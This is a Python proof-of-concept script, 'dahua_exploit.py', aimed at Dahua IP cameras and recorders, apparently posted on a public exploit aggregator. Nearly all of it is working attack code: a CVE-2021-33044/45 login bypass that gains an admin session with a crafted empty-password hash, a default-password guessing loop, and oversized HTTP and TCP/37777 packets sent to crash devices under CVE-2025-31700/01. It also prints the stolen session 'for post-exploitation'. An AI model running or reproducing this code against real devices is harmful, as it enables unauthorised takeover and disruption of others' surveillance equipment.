5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / dahua_exploit.py PY
#!/usr/bin/env python3
"""
Dahua IP Camera - Multi-CVE Scanner & PoC

CVE-2021-33044, CVE-2021-33045, CVE-2025-31700, CVE-2025-31701

Sources: NVD, Dahua Security Advisory DSA-2021-001 / DSA-2025-001
         https://nvd.nist.gov/vuln/detail/CVE-2021-33044
         https://nvd.nist.gov/vuln/detail/CVE-2025-31700

CVE-2021-33044  CVSS 9.8 CRITICAL  CWE-287 (Improper Authentication)
  Auth bypass during RPC2 login via malicious data packet.
  Affects: IPC-HUM7xxx, IPC-HX3xxx, IPC-HX5xxx, TPC-*, VTO-*, VTH-*
  Firmware < 2.820.x.210705 (IPC) / < 2.630.x.210707 (TPC)

CVE-2021-33045  CVSS 9.8 CRITICAL  CWE-287
  Same bypass. Widens scope to NVR-1/2/4/5/6xx & XVR-4x/5x/7x series
  Firmware < 4.001.x.210709

CVE-2025-31700  CVSS 8.1 HIGH  CWE-120 (Buffer Overflow)
  Buffer overflow via specially crafted malicious packet.
  DoS (crash) guaranteed; RCE possible on devices without ASLR.
  Advisory: https://dahuasecurity.com/aboutUs/trustedCenter/details/775

CVE-2025-31701  CVSS 8.1 HIGH  CWE-120 (Buffer Overflow)
  Same buffer overflow, different device set.
  Published: 2025-07-23 (no public PoC yet - DoS test included)
"""

import requests
import hashlib
import socket
import struct
import sys
import argparse

requests.packages.urllib3.disable_warnings()

# ---------------------------------------------------------------------------
# Shared helpers
# ---------------------------------------------------------------------------

def rpc2_challenge(target, port, timeout=8, http=None):
    """Get realm + random nonce + session from the camera's RPC2 login endpoint."""
    try:
        r = (http or requests).post(
            f"http://{target}:{port}/RPC2_Login",
            json={"method": "global.login",
                  "params": {"userName": "admin", "password": "",
                              "clientType": "Web3.0",
                              "loginType": "Direct",
                              "authorityType": "Default",
                              "passwordType": "Default"},
                  "id": 1, "session": 0},
            timeout=timeout, verify=False)
        data = r.json()
        d = data.get("params", {})
        return d.get("realm", ""), d.get("random", ""), data.get("session", 0)
    except Exception:
        return None, None, 0


def rpc2_login(target, port, user, pw_hash, session=0, timeout=8, http=None):
    """Submit an RPC2 login hash; returns the full JSON response dict."""
    try:
        r = (http or requests).post(
            f"http://{target}:{port}/RPC2_Login",
            json={"method": "global.login",
                  "params": {"userName": user, "password": pw_hash,
                              "clientType": "Web3.0",
                              "loginType": "Direct",
                              "authorityType": "Default",
                              "passwordType": "Default"},
                  "id": 2, "session": session},
            timeout=timeout, verify=False)
        return r.json()
    except Exception as e:
        return {"error": str(e)}


def bypass_hash(user, realm, random_str):
    """Crafted empty-password hash used in CVE-2021-33044/45 bypass."""
    s1 = hashlib.md5(f"{user}:{realm}:".encode()).hexdigest().upper()
    s2 = hashlib.md5(f"{s1}:{random_str}:{s1}".encode()).hexdigest().upper()
    return s2


def legit_hash(user, pw, realm, random_str):
    """Correct hash for default-credential check."""
    s1 = hashlib.md5(f"{user}:{realm}:{pw}".encode()).hexdigest().upper()
    s2 = hashlib.md5(f"{s1}:{random_str}:{s1}".encode()).hexdigest().upper()
    return s2


# ---------------------------------------------------------------------------
# CVE-2021-33044 / CVE-2021-33045 -- Authentication Bypass (CVSS 9.8)
# ---------------------------------------------------------------------------

def test_auth_bypass(target, port=80, timeout=8):
    """
    Attempt the empty-password RPC2 bypass.
    Vulnerable firmware accepts MD5(user:realm:) without any real password.
    Returns (vulnerable: bool, session_id: str)
    """
    http = requests.Session()
    http.verify = False
    print("[*] CVE-2021-33044/45 -- RPC2 auth bypass")
    realm, rnd, sess = rpc2_challenge(target, port, timeout, http=http)
    if not realm:
        print("    [-] RPC2_Login not reachable")
        return False, None

    print(f"    [+] Realm: '{realm}'  Random: '{rnd}'  Session: {sess}")
    bh = bypass_hash("admin", realm, rnd)
    resp = rpc2_login(target, port, "admin", bh, sess, timeout, http=http)

    if resp.get("result") is True:
        sid = resp.get("session", "")
        print(f"    [!!!] VULNERABLE -- session: {sid}")
        return True, sid

    err = resp.get("error", {})
    print(f"    [-] Not vulnerable (patched) -- {err.get('code')}: {err.get('message')}")
    return False, None


def test_default_creds(target, port=80, timeout=8):
    """Check common default passwords (useful regardless of CVE patch status)."""
    http = requests.Session()
    http.verify = False
    print("[*] Default credential check")
    realm, rnd, sess = rpc2_challenge(target, port, timeout, http=http)
    if not realm:
        print("    [-] RPC2_Login not reachable")
        return None

    for user, pw in [("admin", ""), ("admin", "admin"), ("admin", "888888"),
                     ("admin", "666666"), ("admin", "123456"),
                     ("666666", "666666"), ("888888", "888888")]:
        resp = rpc2_login(target, port, user, legit_hash(user, pw, realm, rnd), sess, timeout, http=http)
        if resp.get("result") is True:
            print(f"    [+] Valid: {user}:{pw!r}")
            return user, pw, resp.get("session")

    print("    [-] No default credentials matched")
    return None


# ---------------------------------------------------------------------------
# CVE-2025-31700 / CVE-2025-31701 -- Buffer Overflow DoS (CVSS 8.1)
# ---------------------------------------------------------------------------

def _send_overflow_http(target, port, timeout=8):
    """
    Send an oversized payload to the RPC2 HTTP parser.
    A vulnerable device may crash (DoS) or behave unexpectedly.
    """
    oversized_value = "A" * 8192   # well beyond any sane field limit

    payload = {
        "method": "global.login",
        "params": {
            "userName": oversized_value,
            "password": oversized_value,
            "clientType": oversized_value,
            "authorityType": "Default",
            "passwordType": "Default"
        },
        "id": 1
    }
    try:
        r = requests.post(
            f"http://{target}:{port}/RPC2_Login",
            json=payload, timeout=timeout, verify=False)
        return r.status_code, len(r.content)
    except requests.exceptions.ConnectionError:
        return "CONNECTION_RESET", 0
    except requests.exceptions.Timeout:
        return "TIMEOUT", 0
    except Exception as e:
        return str(e), 0


def _send_overflow_tcp(target, tcp_port=37777, timeout=8):
    """
    Send an oversized raw TCP packet to the Dahua binary protocol port (37777).
    Devices without ASLR may crash.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((target, tcp_port))

        # Minimal Dahua binary frame header (magic 0xFF010000) + oversized body
        body = b"A" * 65535
        header = struct.pack(">I", 0xFF010000) + struct.pack(">I", len(body))
        s.sendall(header + body)

        try:
            resp = s.recv(1024)
            s.close()
            return "RESPONDED", len(resp)
        except socket.timeout:
            s.close()
            return "TIMEOUT_AFTER_SEND", 0
    except ConnectionRefusedError:
        return "PORT_CLOSED", 0
    except Exception as e:
        return str(e), 0


def test_buffer_overflow(target, port=80, timeout=8):
    """
    CVE-2025-31700 / CVE-2025-31701 -- overflow probe.
    Sends over-length data to HTTP RPC2 and optional TCP/37777.
    A crash or connection reset may indicate the device is vulnerable.
    WARNING: This test may cause the device to crash (DoS).
    """
    print("[*] CVE-2025-31700/01 -- Buffer overflow DoS probe")
    print("    [!] WARNING: may crash the target device")

    # HTTP overflow
    status, length = _send_overflow_http(target, port, timeout)
    print(f"    HTTP response  : status={status}  len={length}")
    http_vuln = status in ("CONNECTION_RESET", "TIMEOUT") or (
        isinstance(status, int) and status >= 500)

    # TCP overflow on port 37777 (Dahua binary protocol)
    tcp_status, tcp_len = _send_overflow_tcp(target, 37777, timeout)
    print(f"    TCP/37777      : {tcp_status}  len={tcp_len}")
    tcp_vuln = tcp_status in ("TIMEOUT_AFTER_SEND",) or (
        isinstance(tcp_status, str) and "reset" in tcp_status.lower())

    if http_vuln or tcp_vuln:
        print("    [!!!] Possible DoS -- device may have crashed (CVE-2025-31700/01)")
        return True
    else:
        print("    [-] No obvious crash response (may still be vulnerable -- check manually)")
        return False


# ---------------------------------------------------------------------------
# Main runner
# ---------------------------------------------------------------------------

CVE_MAP = {
    "2021-33044": lambda t, p, to: test_auth_bypass(t, p, to),
    "2021-33045": lambda t, p, to: test_auth_bypass(t, p, to),
    "2025-31700": lambda t, p, to: (test_buffer_overflow(t, p, to), None),
    "2025-31701": lambda t, p, to: (test_buffer_overflow(t, p, to), None),
}


def run_all(target, port, timeout):
    print(f"""
==================================================
  Dahua Multi-CVE Scanner
  CVE-2021-33044/45 | CVE-2025-31700/01
==================================================
Target : {target}:{port}
""")

    bypass_ok, session = test_auth_bypass(target, port, timeout)
    print()
    default_ok = test_default_creds(target, port, timeout)
    print()
    bof_ok = test_buffer_overflow(target, port, timeout)

    print("\n" + "=" * 50)
    print("SUMMARY")
    print("=" * 50)
    print(f"  CVE-2021-33044/45 auth bypass : {'VULNERABLE' if bypass_ok else 'Not Vulnerable (patched or unreachable)'}")
    print(f"  Default credentials           : {'FOUND' if default_ok else 'None matched'}")
    print(f"  CVE-2025-31700/01 buffer ovfl : {'POSSIBLE' if bof_ok else 'No crash observed'}")

    if bypass_ok and session:
        print(f"\n  [!!!] Session ID for post-exploitation: {session}")
        print("  Use dahua_auth_bypass.py --dump to enumerate device info.")


def main():
    parser = argparse.ArgumentParser(
        description="Dahua Multi-CVE Scanner",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
CVEs covered:
  2021-33044 / 2021-33045  -- RPC2 auth bypass     (CVSS 9.8)
  2025-31700 / 2025-31701  -- Buffer overflow DoS   (CVSS 8.1)

Examples:
  python dahua_exploit.py 192.168.1.100
  python dahua_exploit.py 192.168.1.100 -p 8080
  python dahua_exploit.py 192.168.1.100 -c 2021-33044
        """
    )
    parser.add_argument("target", help="Camera IP or hostname")
    parser.add_argument("-p", "--port", type=int, default=80,
                        help="HTTP port (default: 80)")
    parser.add_argument("-c", "--cve",
                        choices=list(CVE_MAP.keys()),
                        help="Test a single CVE only")
    parser.add_argument("--timeout", type=int, default=8)
    args = parser.parse_args()

    if args.cve:
        CVE_MAP[args.cve](args.target, args.port, args.timeout)
    else:
        run_all(args.target, args.port, args.timeout)


if __name__ == "__main__":
    main()